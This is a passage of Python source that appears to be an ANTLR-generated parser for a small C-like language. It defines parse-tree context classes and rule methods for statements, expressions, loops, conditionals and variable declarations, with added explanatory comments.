            self.state = 350
            self.arrayPart()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class PointerPartContext(ParserRuleContext):
    """Parse-tree node for the ``pointerPart`` grammar rule.

    Generated ANTLR-style context: a pointer with an optional cv-qualifier.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def pointer(self):
        return self.getTypedRuleContext(SmallCParser.PointerContext,0)

    def cvQualifier(self):
        return self.getTypedRuleContext(SmallCParser.CvQualifierContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_pointerPart

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterPointerPart" ):
            listener.enterPointerPart(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitPointerPart" ):
            listener.exitPointerPart(self)

def pointerPart(self):
    # Parse `pointerPart` (rule index 46): pointer cvQualifier?
    # (e.g. `*` optionally followed by `const`).  ATN state numbers are
    # generator-emitted; do not edit.
    localctx = SmallCParser.PointerPartContext(self, self._ctx, self.state)
    self.enterRule(localctx, 46, self.RULE_pointerPart)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 353
        self.pointer()
        self.state = 355
        _la = self._input.LA(1)
        # Optional trailing `const`.
        if _la==SmallCParser.CONST:
            self.state = 354
            self.cvQualifier()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ArrayPartContext(ParserRuleContext):
    """Parse-tree node for the ``arrayPart`` grammar rule.

    Generated ANTLR-style context: `[` expression? `]`.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def LSBRA(self):
        return self.getToken(SmallCParser.LSBRA, 0)

    def RSBRA(self):
        return self.getToken(SmallCParser.RSBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_arrayPart

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterArrayPart" ):
            listener.enterArrayPart(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitArrayPart" ):
            listener.exitArrayPart(self)

def arrayPart(self):
    # Parse `arrayPart` (rule index 48): LSBRA expression? RSBRA.
    # The bitmask is the expression FIRST set (prefix operators, '(',
    # literals, identifiers).  ATN state numbers are generator-emitted.
    localctx = SmallCParser.ArrayPartContext(self, self._ctx, self.state)
    self.enterRule(localctx, 48, self.RULE_arrayPart)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 357
        self.match(SmallCParser.LSBRA)
        self.state = 359
        _la = self._input.LA(1)
        # Optional size expression between the brackets.
        if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
            self.state = 358
            self.expression()
        self.state = 361
        self.match(SmallCParser.RSBRA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StatementsContext(ParserRuleContext):
    """Parse-tree node for the ``statements`` grammar rule (a `{...}` block).

    Generated ANTLR-style context over zero or more ``statement`` children.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def LCBRA(self):
        return self.getToken(SmallCParser.LCBRA, 0)

    def RCBRA(self):
        return self.getToken(SmallCParser.RCBRA, 0)

    def statement(self, i:int=None):
        # All StatementContext children when i is None, else the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.StatementContext)
        else:
            return self.getTypedRuleContext(SmallCParser.StatementContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_statements

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterStatements" ):
            listener.enterStatements(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitStatements" ):
            listener.exitStatements(self)

def statements(self):
    # Parse `statements` (rule index 50): LCBRA statement* RCBRA.
    # The bitmask is the FIRST set of `statement` (expression starters,
    # type keywords, control keywords, ';', '{').  ATN state numbers are
    # generator-emitted; do not edit.
    localctx = SmallCParser.StatementsContext(self, self._ctx, self.state)
    self.enterRule(localctx, 50, self.RULE_statements)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 363
        self.match(SmallCParser.LCBRA)
        self.state = 367
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Loop while the lookahead can begin another statement.
        while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.T__18) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.LCBRA) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST) | (1 << SmallCParser.IF) | (1 << SmallCParser.DO) | (1 << SmallCParser.WHILE) | (1 << SmallCParser.FOR) | (1 << SmallCParser.RETURN) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
            self.state = 364
            self.statement()
            self.state = 369
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 370
        self.match(SmallCParser.RCBRA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StatementContext(ParserRuleContext):
    """Parse-tree node for the ``statement`` grammar rule.

    Generated ANTLR-style context; exactly one of the child accessors
    below returns non-None, depending on which alternative matched.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def statements(self):
        return self.getTypedRuleContext(SmallCParser.StatementsContext,0)

    def ifCond(self):
        return self.getTypedRuleContext(SmallCParser.IfCondContext,0)

    def whileCond(self):
        return self.getTypedRuleContext(SmallCParser.WhileCondContext,0)

    def doWhileCond(self):
        return self.getTypedRuleContext(SmallCParser.DoWhileCondContext,0)

    def forLoop(self):
        return self.getTypedRuleContext(SmallCParser.ForLoopContext,0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def variableDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,0)

    def returnStmt(self):
        return self.getTypedRuleContext(SmallCParser.ReturnStmtContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_statement

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterStatement" ):
            listener.enterStatement(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitStatement" ):
            listener.exitStatement(self)

def statement(self):
    # Parse `statement` (rule index 52).  Nine alternatives selected by
    # a single token of lookahead (LL(1) switch, no adaptive prediction):
    # block, if, while, do-while, for, expression ';', declaration ';',
    # return ';', or a bare ';' (T__18 is presumably ';'; confirm against
    # the grammar).  ATN state numbers are generator-emitted; do not edit.
    localctx = SmallCParser.StatementContext(self, self._ctx, self.state)
    self.enterRule(localctx, 52, self.RULE_statement)
    try:
        self.state = 387
        token = self._input.LA(1)
        if token in [SmallCParser.LCBRA]:
            # `{ ... }` nested block.
            self.enterOuterAlt(localctx, 1)
            self.state = 372
            self.statements()
        elif token in [SmallCParser.IF]:
            self.enterOuterAlt(localctx, 2)
            self.state = 373
            self.ifCond()
        elif token in [SmallCParser.WHILE]:
            self.enterOuterAlt(localctx, 3)
            self.state = 374
            self.whileCond()
        elif token in [SmallCParser.DO]:
            self.enterOuterAlt(localctx, 4)
            self.state = 375
            self.doWhileCond()
        elif token in [SmallCParser.FOR]:
            self.enterOuterAlt(localctx, 5)
            self.state = 376
            self.forLoop()
        elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
            # Expression statement: expression followed by the terminator.
            self.enterOuterAlt(localctx, 6)
            self.state = 377
            self.expression()
            self.state = 378
            self.match(SmallCParser.T__18)
        elif token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
            # Local variable declaration followed by the terminator.
            self.enterOuterAlt(localctx, 7)
            self.state = 380
            self.variableDeclaration()
            self.state = 381
            self.match(SmallCParser.T__18)
        elif token in [SmallCParser.RETURN]:
            self.enterOuterAlt(localctx, 8)
            self.state = 383
            self.returnStmt()
            self.state = 384
            self.match(SmallCParser.T__18)
        elif token in [SmallCParser.T__18]:
            # Empty statement (lone terminator).
            self.enterOuterAlt(localctx, 9)
            self.state = 386
            self.match(SmallCParser.T__18)
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ExpressionContext(ParserRuleContext):
    """Parse-tree node for the ``expression`` grammar rule.

    Generated ANTLR-style context; exactly one of the child accessors
    below returns non-None, depending on which alternative matched.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def variable(self):
        return self.getTypedRuleContext(SmallCParser.VariableContext,0)

    def floatLiteral(self):
        return self.getTypedRuleContext(SmallCParser.FloatLiteralContext,0)

    def integerLiteral(self):
        return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext,0)

    def characterLiteral(self):
        return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext,0)

    def stringLiteral(self):
        return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)

    def functionCall(self):
        return self.getTypedRuleContext(SmallCParser.FunctionCallContext,0)

    def oplevel14(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_expression

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterExpression" ):
            listener.enterExpression(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitExpression" ):
            listener.exitExpression(self)

def expression(self):
    # Parse `expression` (rule index 54).  Seven alternatives resolved by
    # adaptive prediction (decision 33) because several share the same
    # first token (e.g. IDENTIFIER starts variable, functionCall, and
    # operator expressions): variable | floatLiteral | integerLiteral |
    # characterLiteral | stringLiteral | functionCall | oplevel14.
    # `oplevel14` presumably names a precedence level in the grammar's
    # operator cascade; confirm against the grammar.  ATN state numbers
    # are generator-emitted; do not edit.
    localctx = SmallCParser.ExpressionContext(self, self._ctx, self.state)
    self.enterRule(localctx, 54, self.RULE_expression)
    try:
        self.state = 396
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 389
            self.variable()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 390
            self.floatLiteral()
            pass
        elif la_ == 3:
            self.enterOuterAlt(localctx, 3)
            self.state = 391
            self.integerLiteral()
            pass
        elif la_ == 4:
            self.enterOuterAlt(localctx, 4)
            self.state = 392
            self.characterLiteral()
            pass
        elif la_ == 5:
            self.enterOuterAlt(localctx, 5)
            self.state = 393
            self.stringLiteral()
            pass
        elif la_ == 6:
            self.enterOuterAlt(localctx, 6)
            self.state = 394
            self.functionCall()
            pass
        elif la_ == 7:
            self.enterOuterAlt(localctx, 7)
            self.state = 395
            self.oplevel14()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IfCondContext(ParserRuleContext):
    """Parse-tree node for the ``ifCond`` grammar rule.

    Generated ANTLR-style context: IF '(' expression ')' statement with
    an optional elseCond child.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def IF(self):
        return self.getToken(SmallCParser.IF, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext,0)

    def elseCond(self):
        return self.getTypedRuleContext(SmallCParser.ElseCondContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_ifCond

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIfCond" ):
            listener.enterIfCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIfCond" ):
            listener.exitIfCond(self)

def ifCond(self):
    # Parse `ifCond` (rule index 56): IF '(' expression ')' statement
    # elseCond?.  The optional else-branch is decided by adaptive
    # prediction (decision 34), which resolves the classic dangling-else
    # by binding `else` to the nearest `if`.  ATN state numbers are
    # generator-emitted; do not edit.
    localctx = SmallCParser.IfCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 56, self.RULE_ifCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 398
        self.match(SmallCParser.IF)
        self.state = 399
        self.match(SmallCParser.LBRA)
        self.state = 400
        self.expression()
        self.state = 401
        self.match(SmallCParser.RBRA)
        self.state = 402
        self.statement()
        self.state = 404
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
        if la_ == 1:
            self.state = 403
            self.elseCond()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ElseCondContext(ParserRuleContext):
    """Parse-tree node for the ``elseCond`` grammar rule (ELSE statement)."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def ELSE(self):
        return self.getToken(SmallCParser.ELSE, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_elseCond

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterElseCond" ):
            listener.enterElseCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitElseCond" ):
            listener.exitElseCond(self)

def elseCond(self):
    # Parse `elseCond` (rule index 58): ELSE statement.  ATN state
    # numbers are generator-emitted; do not edit.
    localctx = SmallCParser.ElseCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 58, self.RULE_elseCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 406
        self.match(SmallCParser.ELSE)
        self.state = 407
        self.statement()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class WhileCondContext(ParserRuleContext):
    """Parse-tree node for the ``whileCond`` grammar rule.

    Generated ANTLR-style context: WHILE '(' expression ')' statement.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def WHILE(self):
        return self.getToken(SmallCParser.WHILE, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_whileCond

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterWhileCond" ):
            listener.enterWhileCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitWhileCond" ):
            listener.exitWhileCond(self)

def whileCond(self):
    # Parse `whileCond` (rule index 60): WHILE '(' expression ')'
    # statement.  ATN state numbers are generator-emitted; do not edit.
    localctx = SmallCParser.WhileCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 60, self.RULE_whileCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 409
        self.match(SmallCParser.WHILE)
        self.state = 410
        self.match(SmallCParser.LBRA)
        self.state = 411
        self.expression()
        self.state = 412
        self.match(SmallCParser.RBRA)
        self.state = 413
        self.statement()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DoWhileCondContext(ParserRuleContext):
    """Parse-tree node for the ``doWhileCond`` grammar rule.

    Generated ANTLR-style context: DO statements WHILE '(' expression ')'.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def DO(self):
        return self.getToken(SmallCParser.DO, 0)

    def statements(self):
        return self.getTypedRuleContext(SmallCParser.StatementsContext,0)

    def WHILE(self):
        return self.getToken(SmallCParser.WHILE, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_doWhileCond

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDoWhileCond" ):
            listener.enterDoWhileCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDoWhileCond" ):
            listener.exitDoWhileCond(self)

def doWhileCond(self):
    # Parse `doWhileCond` (rule index 62):
    #   DO statements WHILE '(' expression ')' T__18
    # Note the body must be a braced `statements` block (not a single
    # statement), and T__18 (presumably ';') terminates the construct.
    # ATN state numbers are generator-emitted; do not edit.
    localctx = SmallCParser.DoWhileCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 62, self.RULE_doWhileCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 415
        self.match(SmallCParser.DO)
        self.state = 416
        self.statements()
        self.state = 417
        self.match(SmallCParser.WHILE)
        self.state = 418
        self.match(SmallCParser.LBRA)
        self.state = 419
        self.expression()
        self.state = 420
        self.match(SmallCParser.RBRA)
        self.state = 421
        self.match(SmallCParser.T__18)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ForLoopContext(ParserRuleContext):
    """Parse-tree node for the ``forLoop`` grammar rule.

    Generated ANTLR-style context; the init clause is either a
    variableDeclaration or a bare variable, followed by two expressions
    and a braced body.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def FOR(self):
        return self.getToken(SmallCParser.FOR, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self, i:int=None):
        # Condition is expression(0), increment is expression(1).
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
        else:
            return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statements(self):
        return self.getTypedRuleContext(SmallCParser.StatementsContext,0)

    def variableDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,0)

    def variable(self):
        return self.getTypedRuleContext(SmallCParser.VariableContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_forLoop

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterForLoop" ):
            listener.enterForLoop(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitForLoop" ):
            listener.exitForLoop(self)

def forLoop(self):
    # Parse `forLoop` (rule index 64):
    #   FOR '(' (variableDeclaration | variable) ';' expression ';'
    #       expression ')' statements
    # The init clause is selected by one token of lookahead (type/CONST
    # keyword => declaration, IDENTIFIER => variable); note that all
    # three header clauses are mandatory here, unlike C.  ATN state
    # numbers are generator-emitted; do not edit.
    localctx = SmallCParser.ForLoopContext(self, self._ctx, self.state)
    self.enterRule(localctx, 64, self.RULE_forLoop)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 423
        self.match(SmallCParser.FOR)
        self.state = 424
        self.match(SmallCParser.LBRA)
        self.state = 427
        token = self._input.LA(1)
        if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
            self.state = 425
            self.variableDeclaration()
        elif token in [SmallCParser.IDENTIFIER]:
            self.state = 426
            self.variable()
        else:
            raise NoViableAltException(self)
        self.state = 429
        self.match(SmallCParser.T__18)
        self.state = 430
        self.expression()
        self.state = 431
        self.match(SmallCParser.T__18)
        self.state = 432
        self.expression()
        self.state = 433
        self.match(SmallCParser.RBRA)
        self.state = 434
        self.statements()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class VariableDeclarationContext(ParserRuleContext):
    """Parse-tree node for the ``variableDeclaration`` grammar rule.

    Generated ANTLR-style context: one or more declaration specifiers
    followed by one or more comma-separated declarator-initializers.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def declaratorInitializer(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclaratorInitializerContext)
        else:
            return self.getTypedRuleContext(SmallCParser.DeclaratorInitializerContext,i)

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        else:
            return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_variableDeclaration

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterVariableDeclaration" ):
            listener.enterVariableDeclaration(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitVariableDeclaration" ):
            listener.exitVariableDeclaration(self)

def variableDeclaration(self):
    # Parse `variableDeclaration` (rule index 66):
    #   declarationSpecifier+ declaratorInitializer (',' declaratorInitializer)*
    # e.g. `const int a = 1, b, *c`.  The caller (statement/forLoop)
    # consumes the trailing ';'.  ATN state numbers are generator-emitted;
    # do not edit.
    localctx = SmallCParser.VariableDeclarationContext(self, self._ctx, self.state)
    self.enterRule(localctx, 66, self.RULE_variableDeclaration)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 437
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # One-or-more declaration specifiers (type keywords / CONST).
        while True:
            self.state = 436
            self.declarationSpecifier()
            self.state = 439
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 441
        self.declaratorInitializer()
        self.state = 446
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Comma-separated tail of additional declarators.
        while _la==SmallCParser.COMMA:
            self.state = 442
            self.match(SmallCParser.COMMA)
            self.state = 443
            self.declaratorInitializer()
            self.state = 448
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DeclarationSpecifierContext(ParserRuleContext):
    """Parse-tree node for the ``declarationSpecifier`` grammar rule.

    Generated ANTLR-style context: either a typeDeclaration or a
    cvQualifier child (exactly one is non-None).
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def typeDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext,0)

    def cvQualifier(self):
        return self.getTypedRuleContext(SmallCParser.CvQualifierContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_declarationSpecifier

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDeclarationSpecifier" ):
            listener.enterDeclarationSpecifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDeclarationSpecifier" ):
            listener.exitDeclarationSpecifier(self)

def declarationSpecifier(self):
    # Parse `declarationSpecifier` (rule index 68): a type keyword
    # (char/float/int/void) => typeDeclaration, or CONST => cvQualifier.
    # Selected by one token of lookahead.  ATN state numbers are
    # generator-emitted; do not edit.
    localctx = SmallCParser.DeclarationSpecifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 68, self.RULE_declarationSpecifier)
    try:
        self.state = 451
        token = self._input.LA(1)
        if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID]:
            self.enterOuterAlt(localctx, 1)
            self.state = 449
            self.typeDeclaration()
        elif token in [SmallCParser.CONST]:
            self.enterOuterAlt(localctx, 2)
            self.state = 450
            self.cvQualifier()
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class CvQualifierContext(ParserRuleContext):
    """Parse-tree node for the 'cvQualifier' rule (a single CONST token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def CONST(self):
        # Accessor for the matched CONST terminal.
        return self.getToken(SmallCParser.CONST, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_cvQualifier

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterCvQualifier" ):
            listener.enterCvQualifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitCvQualifier" ):
            listener.exitCvQualifier(self)
def cvQualifier(self):
    """Parse the 'cvQualifier' rule: match exactly one CONST token."""
    localctx = SmallCParser.CvQualifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 70, self.RULE_cvQualifier)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 453
        self.match(SmallCParser.CONST)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DeclaratorInitializerContext(ParserRuleContext):
    """Parse-tree node for the 'declaratorInitializer' rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def declarator1(self):
        # Child declarator context.
        return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)

    def initializer(self):
        # Optional initializer child; None when no '=' part was parsed.
        return self.getTypedRuleContext(SmallCParser.InitializerContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_declaratorInitializer

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDeclaratorInitializer" ):
            listener.enterDeclaratorInitializer(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDeclaratorInitializer" ):
            listener.exitDeclaratorInitializer(self)
def declaratorInitializer(self):
    """Parse 'declaratorInitializer': a declarator, optionally parenthesized,
    followed by an optional initializer introduced by T__0
    (presumably the '=' literal — TODO confirm against SmallC.g4).
    """
    localctx = SmallCParser.DeclaratorInitializerContext(self, self._ctx, self.state)
    self.enterRule(localctx, 72, self.RULE_declaratorInitializer)
    self._la = 0 # Token type
    try:
        self.state = 467
        self._errHandler.sync(self);
        # Adaptive prediction (decision 41) chooses between the two alternatives.
        la_ = self._interp.adaptivePredict(self._input,41,self._ctx)
        if la_ == 1:
            # Alt 1: '(' declarator1 ')' (T__0 initializer)?
            self.enterOuterAlt(localctx, 1)
            self.state = 455
            self.match(SmallCParser.LBRA)
            self.state = 456
            self.declarator1()
            self.state = 457
            self.match(SmallCParser.RBRA)
            self.state = 460
            _la = self._input.LA(1)
            if _la==SmallCParser.T__0:
                self.state = 458
                self.match(SmallCParser.T__0)
                self.state = 459
                self.initializer()
            pass
        elif la_ == 2:
            # Alt 2: declarator1 (T__0 initializer)?
            self.enterOuterAlt(localctx, 2)
            self.state = 462
            self.declarator1()
            self.state = 465
            _la = self._input.LA(1)
            if _la==SmallCParser.T__0:
                self.state = 463
                self.match(SmallCParser.T__0)
                self.state = 464
                self.initializer()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Declarator1Context(ParserRuleContext):
    """Parse-tree node for the 'declarator1' rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
